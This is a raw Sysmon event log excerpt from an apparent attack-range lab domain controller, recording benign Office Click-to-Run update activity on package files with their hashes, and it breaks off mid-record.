14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\TECHTOOL.GIFMD5=716DC829C7C872BBB862E75DB8254008,SHA256=CBDBE57E6243F53B0AFD380FDAE001DD7CC7D7F9EA14F1C236F4B202E679917E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\SEAMARBL.JPGMD5=35A12C47C321CB1FFC89C51A26DE6442,SHA256=3C2E969F619771C50743F3CBFD2AC45232E415D6DBA35DA9AB3E396A2AE082EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\SEAMARBL.HTMMD5=28C2AD171AB8B37E5E9096DE7014401F,SHA256=945E2FCFF1E6F1F1D6C3EDD31C143060B0B08B6E0BFE8E2AA8FC6BEBC477E3C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\PINELUMB.JPGMD5=13EE239821FBD6583551A20ACDA0AFA8,SHA256=F47BD5823032233EFE5741CF34A4AD8ABF4A7A756F62FCFC8E5E1B35CF3DAD87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\PINELUMB.HTMMD5=09D581D17E721EBCC730165F2CEBE9D1,SHA256=49F83060C280075DD8BCD6ABB1B9AFF8E56D9E1F80D8544A692BAAC4D707E09D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\PAWPRINT.HTMMD5=9129EB1D1575EAA8AE7DE690914DEDB1,SHA256=9EE2D13462273870CEE9EAC0D7F1CBAE50517002687FAEAB2BA9C741B7258E16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\PAWPRINT.GIFMD5=E29AC8D99B6AF0C4E45E16EDED402BEB,SHA256=6568A775306FE92B1D0522831192DD3A00BE15E8CB1773988208F400722C2310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\OFFISUPP.HTMMD5=FF067CB2C24C2A5AFE0CD4CACB8D4187,SHA256=F6F0DF3DB1B5219A3DEE5E6D628D08BD443AAB04F57C1EBABFDA67123628077F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\OFFISUPP.GIFMD5=3750D9CA974FBB77DAE536B5AF53391E,SHA256=A5175C8CC8E023C9F77E202999E1919DFB1C65B33BE909CAE40E5568693E6BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\NOTEBOOK.JPGMD5=F05DB36EA7F31D5801DF60CFD75F8EF9,SHA256=A4318D89FA4632A1901E80D4C421C5FB75CD9EB063257D3BF76865EE898AEAEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\NOTEBOOK.HTMMD5=2622DB49EB262B206F3BD65F44D3E1BC,SHA256=7E05874E3F6C5CCD9A498BEE2DF5D6B4032FEE97F6DE84B03844E46C87817F39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\JUNGLE.HTMMD5=E9639F79EECEFDD8CA91D968E6E4B0EA,SHA256=5B40CCA39787F06312DB1B3117A2AAAE6CF2472E857CB01967C78CEA22A83B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\JUNGLE.GIFMD5=F564A4B1C6965944C91C913631C8B4D1,SHA256=110FF187B02DFDB6C443008C71A9CD831A681560C148A38C8DA1E4F4324ED9A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\JUDGESCH.HTMMD5=7B540514F06A36C2F3F3B2F4E3B0719A,SHA256=723971425D460AB7927DB53C061933CDF6F3DDAA26CD3127C81A1905FCFF481E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\JUDGESCH.GIFMD5=91398899059B056AEA5C3555EE7702B6,SHA256=9377B655AE4CBD749C9E1D9ADA718A48916BC13FF7CCCA9F215667B84E22D7A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\DADSHIRT.HTMMD5=59CECF1C8726502B8792018C73DFBC80,SHA256=B15CCB7D5E972519F5FD750F512B3A5A842F9C5B697A9C4755CCBB4BFC58EC09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\DADSHIRT.GIFMD5=ECDBCE3CD14193CA8AB4EB39A46F8FBC,SHA256=261C61D1F49BDA7227367BF4E627E4C11A14DC801A9A194DE7CFDF405539C14D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\CURRENCY.HTMMD5=579A2A4C6BD52DA5052BE4A7D6C2C04F,SHA256=1FC9016B2FE17847C9A2A6A11274EB77A127FF9B5F2091E5918B1D037F083291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\CURRENCY.GIFMD5=8B6605A800F307C7D1C18509AD9A3402,SHA256=B8C29437AB6055F0160DA3395E0E60C16512DAB343B59C8D0828D10F1B5AB4C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\wordmui.msi.16.en-us.tree.datMD5=5863D0DDBEBB5BD94B015F5B025A49C1,SHA256=B2E5AAD8DC1F6A50683820795D7F781A33FCD61C8448595495A2CD03CA87FBE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\wordmui.msi.16.en-us.boot.tree.datMD5=2A22CC1AFA3AD2A3A7A00F6DEE464450,SHA256=25E14169CAEE16E523AD1B99B07FD3E09455E529E91EFBF70ACFDAE82ACB44D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\word.x-none.msi.16.x-none.tree.datMD5=F69837CAF505DD20242E2A52C0CFD93F,SHA256=67AB1C81546B611D031EBC19E1BC580DB8AAA5769AC9EB8ABF51B46B26A3CE7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\word.x-none.msi.16.x-none.boot.tree.datMD5=0CE6E66F9B60ECF49CD9470D766EACE9,SHA256=5BBA2600753E9A5BE20096D26BE95578D046C4BC29F7933AA304BD0FE24CA46E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\publishermui.msi.16.en-us.tree.datMD5=CDEAE1420D86A1179A2E6053CA326E89,SHA256=7585CFBFADB2CC3572CDD73F44D2B86F35AA027B99D855938B46BD12984B7599,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\publishermui.msi.16.en-us.boot.tree.datMD5=38ED9981105FB713D95ACE6B6C4F9CA4,SHA256=B8905A05F84058992CC2B195C64F9F83CDF718F5EA2168FFCD90664CC1A93B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\publisher.x-none.msi.16.x-none.tree.datMD5=3D3A022B1833288CFA5FD67F3508C7CF,SHA256=C83F0AB41FDA7C4702FD98B9E43632352135D6023939F96436B17BE6E3AAA142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\publisher.x-none.msi.16.x-none.boot.tree.datMD5=F02A9EFEE53A03CE9025D72312B1AD0C,SHA256=7E69611A28E48C54CF0647B7B5DEFB728EAC1EDDD1A31F27F4703F7B032DC068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proofing.msi.16.en-us.tree.datMD5=ECC24BD6F98BCE531906A1C074288AAA,SHA256=B7A7568ABD9568BF92A6F235537116B1D1B774DB683925833774E3B982DADBC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proofing.msi.16.en-us.boot.tree.datMD5=45D60E34DD8D1879072DCACC28C69240,SHA256=5E70A98C7FDAC940190C54841D8DF787DEBB74E61DFED450E572C3A5176EFBE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.fr-fr.msi.16.fr-fr.tree.datMD5=5E5909C5C2D38F669670DE78FD19FD24,SHA256=37A77F117218872EE8B6B080F9EFA7CC9580F2C3EF6C4D62B3CDC5427C4AF271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.fr-fr.msi.16.fr-fr.boot.tree.datMD5=3A87E152828E76001D7B0376D418CF89,SHA256=D840DF747B47EA136F3E67BE0D17F5995C83B0E688F92B24A7508EE9F4ED1A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.es-es.msi.16.es-es.tree.datMD5=713FD91073CABC3041FD33F04A0AD08B,SHA256=CA3B6042EF1CC60D478942E5BB1A65C39747E723B0288BEAF17B7BDF3239B8FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.es-es.msi.16.es-es.boot.tree.datMD5=502B8DDEEA303D071757EB1CA729D241,SHA256=5EDBC4D98C143A69D13A8DD73894662A074BF54C15D934B5AD00D8FF74C24797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.en-us.msi.16.en-us.tree.datMD5=54A8DB0BBC72A56B09F213202EAD3F89,SHA256=3644D17868F6A079A40444FA4E6BB80502665D50E9D2F4E9C3CECD2FDC720D23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\proof.en-us.msi.16.en-us.boot.tree.datMD5=5F88D42A5DD87358AE82296A6E951B77,SHA256=15A1D6EC10292CC8D5C46878939BEB45E694539C364555D6D17873015DFFC965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerview.x-none.msi.16.x-none.tree.datMD5=F906A22EDB17509765B1DF0D09C6A8BF,SHA256=B0C0D0B3D25C421EBBD835A773BA89E10D1EA86176CA9F4A138B157649878840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerview.x-none.msi.16.x-none.boot.tree.datMD5=46463C8B8F151D48A831545BF0CE27BC,SHA256=15A16098623F38E968BBC23E0997C644E2D4837316C5E7C1E1928D8B7B22B947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpointmui.msi.16.en-us.tree.datMD5=65E49463CCA72A1F61ECADBA51701B70,SHA256=88E49D52A81C52C46EC7E8803B196C12A4B9A817ECFFE38BCC72B72E27088BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpointmui.msi.16.en-us.boot.tree.datMD5=C26647D1B13F330C4CC3C7D298CAB8BA,SHA256=BE3989AFA25B9E435B54353EA74FDBE140ADD53B45759798ADEF2C18D4F94DC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpoint.x-none.msi.16.x-none.tree.datMD5=6B84D9B9BEE4C27AC854E24513BBD985,SHA256=F70FFF6FB919EBB538C16863C2921E09D70D230D4A628B9B91515B17EDDB0D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpoint.x-none.msi.16.x-none.boot.tree.datMD5=3FF43A41927D5F9391AA3A98FD0CBBE9,SHA256=3BF65738E0AA4D210238AF885F79EA69A2E140AB076C5391F99F4608C2700A17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpivot.x-none.msi.16.x-none.tree.datMD5=F3A0D08D02E53EC831D98BA3AF2298A3,SHA256=390B30B3CE9064A138B7BCD5E77D53C5BCF7FD8B3A9E2B5A1705511116EFE20E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\powerpivot.x-none.msi.16.x-none.boot.tree.datMD5=404121A7F49B78780308A6D8392C2533,SHA256=A804414C898722BF948FC1E30DF3E6998CE494D23FBA6DDEC807C0BD0D3FC6A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\outlookmui.msi.16.en-us.tree.datMD5=3FAB929F45DD864B20513646D7287168,SHA256=9A6424AAA31DBC4D0CF1028D275FFD1EA90C4B3E8A78A3A3EE2266EFB16D41B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 